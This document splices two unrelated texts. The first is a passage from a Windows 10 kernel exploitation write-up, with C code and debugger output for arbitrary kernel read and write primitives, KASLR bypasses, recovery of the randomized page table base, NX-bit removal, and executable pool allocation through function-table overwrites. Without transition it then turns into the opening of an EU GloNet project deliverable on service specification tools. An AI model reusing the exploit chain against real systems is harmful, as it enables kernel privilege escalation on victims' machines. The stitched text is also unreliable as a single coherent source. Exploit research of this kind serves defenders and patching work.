000000d6'fd73a820  00000299'cfe70700 00000299'cfe70000
```
A user-mode pointer has taken its place. Inspecting that pointer reveals it to be the start of the user-mode mapping directly, as can be seen below:
```
kd> dq 00000299'cfe70000
00000299'cfe70000  00000000'00000000 0010c22c'639ff397
00000299'cfe70010  00000001'0ffeefee ffffbd25'4e080120
00000299'cfe70020  ffffbd25'4e080120 ffffbd25'4e080000
00000299'cfe70030  ffffbd25'4e080000 00000000'00014000

kd> dq ffffbd25'4e080000
ffffbd25'4e080000  00000000'00000000 0010c22c'639ff397
ffffbd25'4e080010  00000001'0ffeefee 00000299'cfe70000
ffffbd25'4e080020  00000299'cfe70000 00000000'00000000
```
In this example the content of the two memory areas is the same, and the Desktop Heap starts at 0xFFFFBD254E080000. While the UserHandleTable and its kernel-mode addresses have been removed, the actual data is still present through the user-mode mapping. By performing a manual search in the user-mode mapping it is possible to locate the handle and from that calculate the kernel-mode address. First the user-mode mapping is found, along with the delta between it and the real Desktop Heap, as seen below.
```c
VOID setupLeak()
{
DWORD64 teb = (DWORD64)NtCurrentTeb();
g_desktopHeap = *(PDWORD64)(teb + 0x828);
g_desktopHeapBase = *(PDWORD64)(g_desktopHeap + 0x28);
DWORD64 delta = g_desktopHeapBase - g_desktopHeap;
g_ulClientDelta = delta;
}
```
Next the kernel-mode address of the tagWND object can be located from the handle:
```c
DWORD64 leakWnd(HWND hwnd)
{
	DWORD i = 0;
	PDWORD64 buffer = (PDWORD64)g_desktopHeap;
	while (1)
	{
		if (buffer[i] == (DWORD64)hwnd)        // handle found in the user-mode mapping
		{
			return g_desktopHeapBase + i * 8;  // same offset in the real Desktop Heap
		}
		i++;
	}
}
```
This overcomes the first part of the mitigation introduced in Creators Update. While the address of the tagWND object can now be found, this does not solve all problems: since SetWindowLongPtr can no longer modify the strName of the following tagWND object, it is still not possible to perform read and write operations on arbitrary kernel memory.
The size of ExtraBytes for a tagWND object, denoted by cbWndExtra, is set when the window class is registered by the API RegisterClassEx. The WNDCLASSEX structure used by RegisterClassEx contains another field called cbClsExtra.
This field defines the size of ExtraBytes for the tagCLS object which is associated with a tagWND object. The tagCLS object is also allocated on the Desktop Heap, and registering the class just prior to allocating the tagWND causes the tagCLS object to be allocated just before the tagWND object. Allocating another tagWND object after that produces the desired layout. The class registration with cbClsExtra set is shown below:
```c
cls.cbSize = sizeof(WNDCLASSEX);
cls.style = 0;
cls.lpfnWndProc = WProc1;
cls.cbClsExtra = 0x18;
cls.cbWndExtra = 8;
cls.hInstance = NULL;
cls.hCursor = NULL;
cls.hIcon = NULL;
cls.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
cls.lpszMenuName = NULL;
cls.lpszClassName = g_windowClassNames1;
cls.hIconSm = NULL;
RegisterClassExW(&cls);
```
By overwriting the cbClsExtra field of the tagCLS object instead of the cbWndExtra field of the tagWND1 object we obtain an analogous situation to before. Using the API SetClassLongPtr instead of SetWindowLongPtr allows for modification of the ExtraBytes of the tagCLS object. This API has not been modified and still writes its ExtraBytes to the Desktop Heap, which once again allows for modifying the strName field of tagWND2.
An arbitrary write function can be implemented as shown below
```c
VOID writeQWORD(DWORD64 addr, DWORD64 value)
{
	DWORD offset = addr & 0xF;
addr -= offset;
DWORD64 filler;
DWORD64 size = 0x8 + offset;
CHAR* input = new CHAR[size];
LARGE_UNICODE_STRING uStr;
if (offset != 0)
{
filler = readQWORD(addr);
}
for (DWORD i = 0; i < offset; i++)
{
input[i] = (filler >> (8 * i)) & 0xFF;
}
for (DWORD i = 0; i < 8; i++)
{
input[i + offset] = (value >> (8 * i)) & 0xFF;
}
RtlInitLargeUnicodeString(&uStr, input, size);
g_fakeDesktop[0x1] = 0;
g_fakeDesktop[0x10] = addr - 0x100;
g_fakeDesktop[0x11] = 0x200;
SetClassLongPtrW(g_window1, 0x308, addr);
	SetClassLongPtrW(g_window1, 0x300, 0x0000002000000020);
SetClassLongPtrW(g_window1, 0x230, (DWORD64)g_fakeDesktop);
	NtUserDefSetText(g_window2, &uStr);
SetClassLongPtrW(g_window1, 0x230, g_rpDesk);
SetClassLongPtrW(g_window1, 0x300, 0x0000000e0000000c);
SetClassLongPtrW(g_window1, 0x308, g_winStringAddr);
}
```
A similar arbitrary read primitive can be created as well, thus completely bypassing the mitigations introduced in Creators Update against kernel-mode read and write primitives.
Kernel ASLR Bypass
The mitigations introduced in Windows 10 Anniversary Update and Creators Update have eliminated all publicly known leaks of kernel driver addresses. Kernel-mode information leak vulnerabilities are found regularly, but these are patched by Microsoft; of more interest are the kernel driver information leaks which are due to design issues. The last two known KASLR bypasses were due to the non-randomization of the HAL Heap and the SIDT assembly instruction; both have been mitigated, in Creators Update and Anniversary Update respectively.
Often kernel driver memory addresses are needed to complete exploits, so discovering new design issues which lead to kernel driver information leaks is needed. The approach used here is to build a KASLR bypass tailored to each kernel-mode read primitive: one for the bitmap primitive and one for the tagWND primitive.
The first one to be discussed is the one related to the bitmap primitive. Looking at the kernel-mode Surface object in the structures reverse engineered from Windows XP and documented by ReactOS shows the Surface object to have the following elements
```c
typedef struct _SURFOBJ
{
    DHSURF  dhsurf;        // 0x000
    HSURF   hsurf;         // 0x004
    DHPDEV  dhpdev;        // 0x008
    HDEV    hdev;          // 0x00c
    SIZEL   sizlBitmap;    // 0x010
    ULONG   cjBits;        // 0x018
    PVOID   pvBits;        // 0x01c
    PVOID   pvScan0;       // 0x020
    LONG    lDelta;        // 0x024
    ULONG   iUniq;         // 0x028
    ULONG   iBitmapFormat; // 0x02c
    USHORT  iType;         // 0x030
    USHORT  fjBitmap;      // 0x032
} SURFOBJ, *PSURFOBJ;      // size: 0x034
```
Reading the description of the field called hdev yields:
```
hdev
    GDI's handle to the device this surface belongs to. In reality a pointer to GDI's PDEVOBJ.
```
This raises the question of what the PDEVOBJ is; luckily that structure is also given on REACTOS and contains
The fields of type PFN are function pointers and will give us a kernel pointer. The method for leaking is then to read the hdev field and use that to read out the function pointer. Inspecting the Surface object in memory shows the value of hdev to be empty.
Creating the bitmap object with the CreateBitmap API does not populate the hdev field, but other APIs exist to create bitmaps. The CreateCompatibleBitmap API also creates a bitmap and a kernel-mode Surface object, and inspecting that object in memory shows it to contain a valid hdev pointer.
Using this pointer and dereferencing offset 0x6F0 gives the kernel-mode address of DrvSynchronizeSurface in the kernel driver cdd.dll.
To leverage this, the following method is employed. First locate the handle to the bitmap which has its Surface object at an offset 0x3000 bytes past the one found with the pool leak. Then free that Surface object by destroying the bitmap and reallocate multiple bitmap objects using the CreateCompatibleBitmap API. This is implemented below.
```c
DWORD64 objAddr = leakPool() + 0x3000;
HBITMAP h3 = (HBITMAP)readQword(objAddr);   // handle field of the target Surface object
DeleteObject(h3);
HBITMAP *KASLRbitmap = new HBITMAP[0x100];
for (DWORD i = 0; i < 0x100; i++)
{
	KASLRbitmap[i] = CreateCompatibleBitmap(dc, 0x364, 0x1);
}
```
The hdev pointer is then at offset 0x3030 from the pool leak, which in turn gives the pointer to DrvSynchronizeSurface. DrvSynchronizeSurface contains a call to the function ExEnterCriticalRegionAndAcquireFastMutexUnsafe in ntoskrnl.exe at offset 0x2B as shown below.
```c
kd> dqs ffffbd25'4001b010 + 6f0 L1
ffffbd25'4001b700  ffffbd5f'eced2bf0 cdd!DrvSynchronizeSurface
```
From this pointer into ntoskrnl.exe it is possible to find the base address by checking for the MZ header and searching backwards 0x1000 bytes at a time until it is found. The complete ntoskrnl.exe base address leak function is shown below.
```c
DWORD64 leakNtBase()
{
	DWORD64 objAddr = leakPool() + 0x3000;
	DWORD64 cdd_DrvSynchronizeSurface = readQword(readQword(objAddr + 0x30) + 0x6f0);
	DWORD64 offset = readQword(cdd_DrvSynchronizeSurface + 0x2d) & 0xFFFFFFFF; // disp32 of the call
	DWORD64 ntAddr = readQword(cdd_DrvSynchronizeSurface + 0x31 + offset);     // import thunk target
	DWORD64 ntBase = getModBaseAddr(ntAddr);
	return ntBase;
}
```
While the above explained KASLR bypass works best while used in conjunction with the bitmap read and write primitive, the tagWND read and write primitive can also make use of a similar idea. By looking at structures documented on REACTOS from Windows XP, the header of a tagWND object is a structure called THRDDESKHEAD, which contains another structure called THROBJHEAD, which in turn contains a pointer to a structure called THREADINFO. This is shown below, first the tagWND structure header.
Followed by the THRDESKHEAD and the THROBJHEAD
Finally, the header of the THREADINFO structure, which contains a structure called W32THREAD
The W32THREAD structure contains a pointer to the KTHREAD object as its first entry
While this is a lot of traversal of very old documented structures, it is worth noticing that even in Windows 10 Creators Update the KTHREAD contains a pointer into ntoskrnl.exe at offset 0x2A8. Thus, given the kernel-mode address of a tagWND object, it is possible to gain a pointer into ntoskrnl.exe. By translating the 32-bit Windows XP structures to 64-bit Windows 10 and inspecting memory, it becomes clear that dereferencing offset 0x10 of the tagWND object gives the pointer to the THREADINFO object. Dereferencing that pointer gives the address of the KTHREAD, as shown in memory below
It is possible to wrap this KASLR bypass in a single function, where the base address of ntoskrnl.exe is found from the pointer into ntoskrnl.exe in the same fashion as explained for the bitmap primitive.
```c
DWORD64 leakNtBase()
{
DWORD64 wndAddr = leakWnd(g_Window1);
DWORD64 ptr = readDWORD(wndAddr + 0x10);
DWORD64 thread = readDWORD(ptr);
DWORD64 ntAddr = readDWORD(thread + 0x2a8);
DWORD64 ntBase = getModBaseAddr(ntAddr);
return ntBase;
}
```
Dynamic Function Location
In the following sections it becomes important to locate the addresses of specific kernel driver functions. While this could be done using static offsets from the module base, those offsets might not survive patches. A better method is to locate the function address dynamically using the kernel-mode read primitive.
The read primitives given so far only read out 8 bytes, but both the bitmap and the tagWND primitive can be modified to read out a buffer of any given size. For the bitmap primitive this depends on the size of the bitmap, which can be modified, allowing for arbitrary read sizes. The arbitrary-size bitmap read primitive is shown below
```c
BYTE* readData(DWORD64 start, DWORD64 size)
{
	BYTE* data = new BYTE[size];
	ZeroMemory(data, size);
	BYTE* pbits = new BYTE[0xe00];
	GetBitmapBits(h1, 0xe00, pbits);   // save the first bitmap's bits
	PDWORD64 pointer = (PDWORD64)pbits;
	pointer[0x18] = start;             // pvScan0 of the second Surface object
	SetBitmapBits(h1, 0xe00, pbits);
	GetBitmapBits(h2, size, data);     // read 'size' bytes starting at 'start'
	delete[] pbits;
	return data;
}
```
The only difference is the modification of the size values and the size of the data buffer to retrieve in the final GetBitmapBits call. This one read primitive will dump the entire kernel driver, or the relevant part of it into a buffer ready for searching inside user-mode memory.
The next idea is using a simple hash value of the function to locate it. The hash function simply adds together four QWORDs read at 4-byte offsets. While no proof of collision avoidance is given, it has turned out to be very effective. The final location function is shown below
```c
DWORD64 locatefunc(DWORD64 modBase, DWORD64 signature, DWORD64 size)
{
	DWORD64 hash = 0;
	DWORD64 pe = readQword(modBase + 0x3C) & 0xFFFF;                             // e_lfanew
	DWORD64 codeBase = modBase + (readQword(modBase + pe + 0x2C) & 0xFFFFFFFF);  // BaseOfCode
	DWORD64 codeSize = readQword(modBase + pe + 0x1C) & 0xFFFFFFFF;              // SizeOfCode
	if (size != 0)
	{
		codeSize = size;
	}
	BYTE* data = readData(codeBase, codeSize);
	BYTE* pointer = data;
	DWORD64 addr = codeBase;
	while (1)
	{
		hash = 0;
		for (DWORD i = 0; i < 4; i++)
		{
			hash += *(PDWORD64)(pointer + i * 4);  // four overlapping QWORDs
		}
		if (hash == signature)
		{
			break;
		}
		addr++;
		pointer = pointer + 1;
	}
	return addr;
}
```
Page Table Randomization
As previously mentioned, the most common way of achieving executable kernel memory in Windows 10 is by modifying the Page Table Entry of the memory page where the shellcode is located. Prior to Windows 10 Anniversary Update the Page Table Entry of a given page could be found through the algorithm shown below.
```c
DWORD64 getPTfromVA(DWORD64 vaddr)
{
vaddr >>= 9;
vaddr &= 0x7FFFFFFFF8;
	vaddr += 0xFFFFF68000000000;
return vaddr;
}
```
In Windows 10 Anniversary Update and Creators Update the base address value of 0xFFFFF68000000000 has been randomized. This makes it impossible to simply calculate the Page Table Entry address for a given memory page. While the base address has been randomized the kernel must still look up Page Table Entries often, so kernel-mode API’s for this must exist. One example of this is MiGetPteAddress in ntoskrnl.exe.
Opening MiGetPteAddress in IDA Pro shows the static, non-randomized base address:
```
MiGetPteAddress proc near
shr rcx, 9
mov rax, 7FFFFFFF8h
and rcx, rax
mov rax, 0FFFFF68000000000h
add rax, rcx
ret
```
However, looking at it in memory shows the randomized base address:
```
nt!MiGetPteAddress:
fffff800'0ccd1254 48c1e909             shr  rcx, 9
fffff800'0ccd1258 48b8f8ffffff07000000 mov  rax, 7FFFFFFF8h
fffff800'0ccd1262 4823c8               and  rcx, rax
fffff800'0ccd1265 48b80000000000cfffff mov  rax, 0FFFFCF0000000000h
fffff800'0ccd126f 4803c1               add  rax, rcx
fffff800'0ccd1272 c3                   ret
```
The idea is to find the address of MiGetPteAddress, read out the randomized base address, and use that instead of the previously static value. The first part can be achieved by leveraging the read primitive and locating the function address as described in the previous section. Having found the address of MiGetPteAddress, the randomized base address of the Page Table Entries sits at an offset of 0x13 bytes into the function. This can be implemented as shown below:
```
VOID leakPTEBase(DWORD64 ntBase)
{
	DWORD64 MiGetPteAddressAddr = locatefunc(ntBase, 0x240101102d32798f, 0xb0000); // prologue hash
g_PTEBase = readQword(MiGetPteAddressAddr + 0x13);
return;
}
```
Next the address of the Page Table Entry of a given memory page can be found by the original method, only using the randomized base address.
```c
DWORD64 getPTfromVA(DWORD64 vaddr)
{
vaddr >>= 9;
	vaddr &= 0x7FFFFFFFF8;
vaddr += g_PTEBase;
return vaddr;
}
```
This may also be verified directly in memory, as shown in the example below for the memory address 0xFFFFF78000000000
```
kd> ? 0xfffff78000000000 >> 9
Evaluate expression: 36028778765352960 = 007ffffb`c0000000
kd> ? 007ffffb`c0000000 & 7FFFFFFFF8h
Evaluate expression: 531502202880 = 0000007b`c0000000
kd> dq 7b`c0000000 + 0FFFFCF0000000000h L1
ffffcf7b`c0000000  80000000`00963963
```
If the shellcode is written to offset 0x800 of the KUSER_SHARED_DATA structure, which is still static in memory at the address 0xFFFFF78000000000, the updated method can be used to locate the Page Table Entry. Then the memory protection can be modified by overwriting the Page Table Entry to remove the NX bit, which is the highest bit.
```c
DWORD64 PteAddr = getPTfromVA(0xFFFFF78000000000);
DWORD64 modPte = readQword(PteAddr) & 0x0FFFFFFFFFFFFFFF;
writeQword(PteAddr, modPte);
```
Execution of the shellcode can be performed with known methods like overwriting the HalDispatchTable and then calling the user-mode API NtQueryIntervalProfile.
```c
BOOL getProc(DWORD64 halDispatchTable, DWORD64 addr)
{
_NtQueryIntervalProfile NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryIntervalProfile");
writeQword(halDispatchTable + 8, addr);
ULONG result;
NtQueryIntervalProfile(0, &result);
return TRUE;
}
```
This technique de-randomizes the Page Tables and brings back the Page Table Entry overwrite technique.
Executable Memory Allocation
While modifying the Page Table Entry of an arbitrary memory page containing shellcode works, the method from Windows 7 of directly allocating executable kernel memory is neater. This section explains how this is still possible on Windows 10 Creators Update.
Many kernel pool allocations are performed by the kernel driver function ExAllocatePoolWithTag in ntoskrnl.exe. According to MSDN the function takes three arguments, the type of pool, size of the allocation and a tag value.
```c
PVOID ExAllocatePoolWithTag(
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag
);
```
Just as importantly, on success the function returns the address of the new allocation to the caller. While NonPagedPoolNX is the new standard pool type for most allocations, the following pool types still exist on Windows 10.
```c
NonPagedPool = 0x0
NonPagedPoolExecute = 0x0
PagedPool = 0x1
NonPagedPoolMustSucceed = 0x2
DontUseThisType = 0x3
NonPagedPoolCacheAligned = 0x4
PagedPoolCacheAligned = 0x5
NonPagedPoolCacheAlignedMustS = 0x6
MaxPoolType = 0x7
NonPagedPoolBase = 0x0
NonPagedPoolBaseMustSucceed = 0x2
NonPagedPoolBaseCacheAligned = 0x4
NonPagedPoolBaseCacheAlignedMustS = 0x6
NonPagedPoolSession = 0x20
PagedPoolSession = 0x21
NonPagedPoolMustSucceedSession = 0x22
DontUseThisTypeSession = 0x23
NonPagedPoolCacheAlignedSession = 0x24
PagedPoolCacheAlignedSession = 0x25
NonPagedPoolNx = 0x200
```
Specifying the value 0 as pool type forces an allocation of pool memory which is readable, writable and executable. Calling this function from user-mode can be done the same way shellcode pages are executed, through NtQueryIntervalProfile. Sadly, to reach the overwritten entry in the HalDispatchTable, specific arguments must be supplied, rendering the call to ExAllocatePoolWithTag invalid.
Another way of calling ExAllocatePoolWithTag is therefore needed. The technique used for overwriting the HalDispatchTable could work for other user-mode functions if different function tables can be found. One such function table is gDxgkInterface in the kernel driver win32kbase.sys; the start of the function table is seen below.
Many functions use this function table. The requirements for the function we need are the following: it must be callable from user-mode, it must allow at least three user-controlled arguments to pass through without modification, and it must be called rarely by the operating system or background processes, to avoid use after we overwrite the function table.
One function which matches these requirements is the user-mode function NtGdiDdDDICreateAllocation, which in dxgkrnl.sys is called DxgkCreateAllocation and is seen above at offset 0x68 in the function table. The user-mode function is not exported, and consists only of a system call stub in win32u.dll. It is possible to implement the system call directly, as shown below:
```
NtGdiDdDDICreateAllocation PROC
    mov r10, rcx
    mov eax, 118Ah
    syscall
    ret
NtGdiDdDDICreateAllocation ENDP
```
When the system call is invoked it gets transferred to the kernel driver win32k.sys which dispatches it to win32kfull.sys, which in turn dispatches it to win32kbase.sys. In win32kbase.sys the function table gDxgkInterface is referenced and a call is made to offset 0x68. The execution flow can be seen below
All the involved drivers only implement very thin trampolines around the system call. The consequence is that no arguments are modified, which satisfies the second requirement. During testing, overwriting the DxgkCreateAllocation function pointer did not cause any unintended problems due to additional calls, which satisfies the third and final requirement.
To use NtGdiDdDDICreateAllocation and the gDxgkInterface function table, the latter must be writable. The Page Table Entry of the function table is inspected below.
While the content of the Page Table Entry may be hard to interpret directly, it can be printed according to the structure _MMPTE_HARDWARE and shows the function table to be writable:
```
kd> dt _MMPTE_HARDWARE ffffc7f`548ef570
nt!_MMPTE_HARDWARE
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y0
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y000000000000110110101010000000000000
   +0x000 reserved1        : 0y0000
   +0x000 SoftwareWsIndex  : 0y10011110110 (0x4f6)
   +0x000 NoExecute        : 0y1
In principle, all the elements needed are in place: the idea is to overwrite the function pointer DxgkCreateAllocation at offset 0x68 in the function table gDxgkInterface with ExAllocatePoolWithTag, followed by a call to NtGdiDdDDICreateAllocation specifying NonPagedPoolExecute as pool type. The remaining practical issue is locating the gDxgkInterface function table. We have several KASLR bypasses to locate the base address of ntoskrnl.exe, but so far no way to find other drivers.
The structure PsLoadedModuleList in ntoskrnl.exe contains the base address of all loaded kernel modules, thus finding other kernel drivers in memory is possible. The structure of the doubly-linked list given by PsLoadedModuleList is shown below:
```
kd> dq nt!PsLoadedModuleList L2
ffff8003`4c7e5a50  ffff8003`30c1e530 ffff800a`3a347e80
kd> dt nt!_LDR_DATA_TABLE_ENTRY ffff8003`30c1e530
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0xffff8003`30c1e530 - 0xffff8003`4c7e5a50 ]
   +0x010 InMemoryOrderLinks : _LIST_ENTRY [ 0xffff8003`4c7e5a50 - 0x00000000`00053760 ]
   +0x020 InInitializationOrderLinks : _LIST_ENTRY [ 0x00000000`00000000 - 0x00000000`00053760 ]
   +0x030 DllBase          : 0xffff8003`4c41e000 Void
   +0x038 EntryPoint       : 0xffff8003`4c61e010 Void
   +0x040 SizeOfImage      : 0x00000000
   +0x048 FullDllName      : _UNICODE_STRING "\SystemRoot\system32\ntoskrnl.exe"
   +0x058 BaseDllName      : _UNICODE_STRING "ntoskrnl.exe"
Thus, iterating through the linked list until the correct name at offset 0x60 is found will allow reading the base address at offset 0x30.
Locating the PsLoadedModuleList structure directly using the previously mentioned function-finding algorithm does not work, since it is not a function but just a pointer. Many functions use the structure, however, so it is possible to find the pointer through one of them.
KeCapturePersistentThreadState in ntoskrnl.exe uses PsLoadedModuleList, as can be seen below.
It is possible to use the function finding algorithm to locate KeCapturePersistentThreadState and then dereference PsLoadedModuleList, which in turn will give the base address of any loaded kernel module.
While getting the base address of win32kbase.sys is possible, the problem of locating the function table gDxgkInterface is the same as finding the PsLoadedModuleList pointer. A better approach is finding a function which uses the function table and then read the address of gDxgkInterface from that.
One viable function is DrvOcclusionStateChangeNotify in the kernel driver win32kfull.sys, which has the disassembly shown below
```
DrvOcclusionStateChangeNotify proc near
var_18 = dword ptr -18h
var_10 = dword ptr -10h
; FUNCTION CHUNK AT 00000001C0157D2E
    sub  rsp, 38h
    mov  rax, [rsp+38h]
    lea  rcx, [rsp+38h+var_18]
    mov  [rsp+38h+var_10], rax
    mov  rax, cs:_imp_?gDxgkInterface@@QAE
    mov  [rsp+38h+var_18], 1
    mov  rax, [rax+408h]
From this function pointer, the function table can be found, which allows for overwriting the DxgkCreateAllocation function pointer with ExAllocatePoolWithTag.
Following the pool allocation, the shellcode can be written to it using the kernel-mode write primitive. Finally, the gDxgkInterface function table can be overwritten again with the pool address followed by an additional call to NtGdiDdDDICreateAllocation.
```c
writeShellcode(poolAddr);
writeQword(gDxgkInterface + 0x68, poolAddr);
NtGdiDdDDICreateAllocation(gDxgkInterface + 0x68, DxgkCreateAllocation, 0, 0);
```
The arguments for the NtGdiDdDDICreateAllocation function call are the address of DxgkCreateAllocation and its original place in the function table. This allows the shellcode to restore the function pointers in the function table, preventing future calls to NtGdiDdDDICreateAllocation from crashing the operating system.
D4.4 Prototype of the system for enhanced services recommendation
Sargolzaei, M.; Shafahi, M.; Afsarmanesh, H.
DOI
10.13140/RG.2.1.3697.4242
Publication date
2014
Document Version
Final published version
Citation for published version (APA):
Glocal enterprise network
focusing on customer-centric collaboration
D4.4
Prototype of the system for enhanced services recommendation
Edited by
UvA
September 2014
Project funded by the European Commission under the
ICT – Factories of the Future Programme
Contract Start Date: 1 Sep 2011 Duration: 42 months
GloNet WP4
CUSTOMIZED SERVICE-ENHANCED PRODUCT SPECIFICATION
Deliverable data
<table>
<thead>
<tr>
<th>Deliverable no & name</th>
<th>D4.4 – Prototype of the system for enhanced services recommendation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Main Contributors</td>
<td>UvA: Mahdi Sargolzaei, Mohammad Shafahi, Hamideh Afsarmanesh</td>
</tr>
<tr>
<td>Other Contributors</td>
<td></td>
</tr>
<tr>
<td>Internal Reviews</td>
<td>Luis Camarinha-Matos (Uninova), Victor Thamburaj (iPLON)</td>
</tr>
<tr>
<td>Dissemination level</td>
<td>Public</td>
</tr>
<tr>
<td>Date</td>
<td>September 2014</td>
</tr>
<tr>
<td>Status</td>
<td>Final</td>
</tr>
</tbody>
</table>
Deliverable summary
This deliverable addresses the prototypes of two tools that are implemented as a part of the PSS sub-system in the GloNet system, namely the Service Specification Tool (SST) and the Product/Service Discovery and Recommendation (PSDR) tool. The designs of these tools are presented in deliverable D4.3. These two tools, as well as the Product Specification Tool (PST) presented in D4.1 and D4.2, are well integrated as the PSS (Product and Service Specification) sub-system, supporting proper specification of different aspects of complex products. The PSS sub-system provides the set of mechanisms needed for specification, registration, discovery, and recommendation-based ranking of sub-products and business services, as well as the composition of business services, and assists with the enhancement of products with business services. As such, this deliverable addresses the implementation aspects related to service-enhanced product specification and recommendation, while the complete design of the functionalities for this sub-system is provided in deliverable D4.3. Moreover, a set of examples of using the SST and PSDR tools, with some screenshots from the PSS, is presented.
TABLE OF CONTENTS
PROJECT-RELATED SUMMARY .......................................................................................................... 4
1 INTRODUCTION ............................................................................................................................... 6
2 IMPLEMENTATION APPROACHES and DETAILS ....................................................................... 8
2.1 General architecture ......................................................................................................................... 8
2.2 Data Model ........................................................................................................................................ 10
2.3 Integration of PSS with the other sub-systems of GloNet .............................................................. 11
3 PSS- USING PRODUCT/SERVICE SPECIFICATION SUB-SYSTEM – Focused on SST and PSDR tools ........................................................................................................................................... 13
4 SST and PSDR TOOLS ................................................................................................................. 16
4.1 Adding a new service specification .................................................................................................. 16
4.2 Adding a new feature-kind .............................................................................................................. 19
4.3 Adding a new unit ............................................................................................................................ 19
4.4 Adding new classes .......................................................................................................................... 20
4.5 Viewing / managing existing product specifications ......................................................................... 20
4.6 Sending a Launch Request ............................................................................................................ 22
4.7 PSDR- Discovering of Services ....................................................................................................... 24
4.8 PSDR- Discovering of products ..................................................................................................... 25
5 CONCLUDING REMARKS ............................................................................................................. 27
6 REFERENCES ................................................................................................................................ 28
ANNEX I- AN EXAMPLE SCENARIO AS A GUIDELINE FOR THE PSS ............................................ 29
PROJECT-RELATED SUMMARY
This deliverable (D4.4) is the fourth deliverable of WP4, which designs and develops the PSS (product/service specification) sub-system of GloNet, and it plays a main role in interconnecting the PST (product specification tool) and SST (service specification tool) developments of WP4 to other workpackages, mainly WP5 and WP3. D4.4 is the outcome of Task 4.4, and represents a detailed implementation report of several base functionalities that support the specification of business services within the complex product, and also potentially as enhancements for the specified products by their designers. The product specification functionalities have already been designed and developed, as described in the previous deliverables D4.2 and D4.3.
The deliverable D4.4 addresses the last major step in complex product specification, namely the customized service-enhanced product specification. Findings reported in deliverables: D1.1 (“Detailed requirements for GloNet use case and domain glossary”) [1], D1.2 (“Specification of business scenarios”) [2], D2.1 (“Required information/knowledge provision services specification”) [3], D2.4 (“Mechanisms for defining composed services to support collaboration”) [4], D4.1 (“Design report on approach and mechanism for effective customized complex product specification”) [5], and D4.2 (“Prototype of Services supporting iterative complex product specification”) [6] constitute the background for complex product specification addressed in this deliverable. However, the designed mechanisms and approaches addressed in D4.3 (“Report on dynamically customizable services enhancing products”) [7] which were designed in Task 4.3, constitute the main input and the base for this deliverable. In fact, this deliverable aims at the Prototype developed for the tools designed and presented in D4.3, namely the Service Specification Tool (SST) and the Product/Service Discovery and Recommendation tool (PSDR). Furthermore, as addressed in the deliverable, SST and PSDR are also integrated with the Product Specification Tool (PST, addressed in D4.1 and D4.2). The three tools PST, SST, and PSDR together form the Product/Service Specification (PSS) sub-system of the GloNet, which supports iterative complex service-enhanced product specification.
The specifications generated for complex products in PSS then provides an input to product portfolio sub-system addressed in D4.5 “Design and prototype of product portfolio system”. The following figure summarizes different tasks and deliverables of WP4.
It is important to notice that similar to PST, the developments of SST and PSDR addressed in this deliverable play an important role in the success of functionalities addressed especially in WP5. This is due to the fact that the specifications generated by stakeholders using the developed product/service specification sub-system (PSS) of WP4, constitute a main input for identification of needed competencies from organizations, and thus selection of most-fit organizations in the VO creation process, as addressed in D5.22.
This deliverable provides a number of screenshots from the product/service specification (PSS) sub-system and is more focused on SST and PSDR.
1 INTRODUCTION
Complex products addressed in the GloNet, namely the solar power plants and intelligent buildings, are examples of products that are one of a kind in their design specifications, while they benefit from the reuse of already existing sub-specifications, and tailoring some previously specified designs to what exactly fits each specific complex product case.
Our requirement analysis of GloNet in D1.1 [1] revealed that such complex products require supporting tools and systems for detailed specifications. Furthermore, complex products are dynamic, and therefore the supporting tools for specification of products and services need to be usable at different stages of the Product Life Cycle (PLC) of these complex products [7], [8]. Besides being heavily used during the design and engineering stage of the PLC, they are also needed infrequently during the operation/evaluation stage of the PLC, as well as during the pre-PLC phase of preparing the bid for the complex product. Please also note that the specification of a complex product, including its sub-product specifications and business service specifications, is typically performed iteratively in a number of sessions, potentially involving a number of different stakeholders at each time, who may collaborate to specify different components (sub-products and services) of the complex product. In fact, complex product specification is mostly done by consulting or EPC (Engineering, Procurement, and Construction) companies in interaction with the customer. Several other stakeholders (e.g. product and equipment providers, component developers, and business service providers) might also be involved in the VBE community around the complex product and will use the specification tool to provide the details of their products and services and to create awareness about them. Therefore, around each complex product, a variety of stakeholders (e.g. designers, manufacturers, EPC staff, customers, etc.) can join together and form a Design Group to specify this complex product, and should therefore be supported in GloNet.
As addressed in [7], the Product/Service Specification (PSS) sub-system consists of three main sets of tools, as also indicated in Figure 1 under the service-enhanced product support header. These include: the Product Specification & Registration Tool (PST), the Service Specification & Registration Tool (SST), and finally the Product/Service Discovery & Recommendation Engine (PSDR).
Details related to the first tool, the Product Specification & Registration (PST), on its design and development are provided in [5] and [6] respectively. In [7], we have discussed the design of the other two tools, SST & PSDR, and addressed their needed functional and non-functional requirements, as well as our proposed approaches to realize them. Finally, in this deliverable, the implementation and development aspects of these two tools are reported.
Since the design of SST and PSDR prototypes have been detailed out previously (in [7]), in this document we only revisit some design aspects briefly when and if necessary to extend/augment the original design. As described in [7], each business service is materialized either manually through human activities (which we call Manual tasks), or automatically through some software (which we call Software services). The SST tool covers the specification of both of these kinds of business services, as well as the combination of some manual tasks and software services, called Composite services, as further addressed in this document.
It is also important to note that the realization of the non-functional requirements of the SST and PSDR (addressed in [7]), including security, scalability, availability, etc., is supported similarly to the realization of the non-functional requirements of the PST, which is addressed in [6]. Therefore, we have not addressed these aspects here to avoid repetition.
The following sections of this document provide more details on certain important implementation aspects related to the service specification system, and product/service discovery and recommendation, structured in the next two sections. Section 2 addresses the implementation approach, and section 3 and 4 describe and provide examples for the use of the product/service specification sub-system. Some concluding remarks are provided in Section 5. Also in the Annex of this document, we have provided an example scenario for the use of the entire PSS sub-system of GloNet.
2 IMPLEMENTATION APPROACHES AND DETAILS
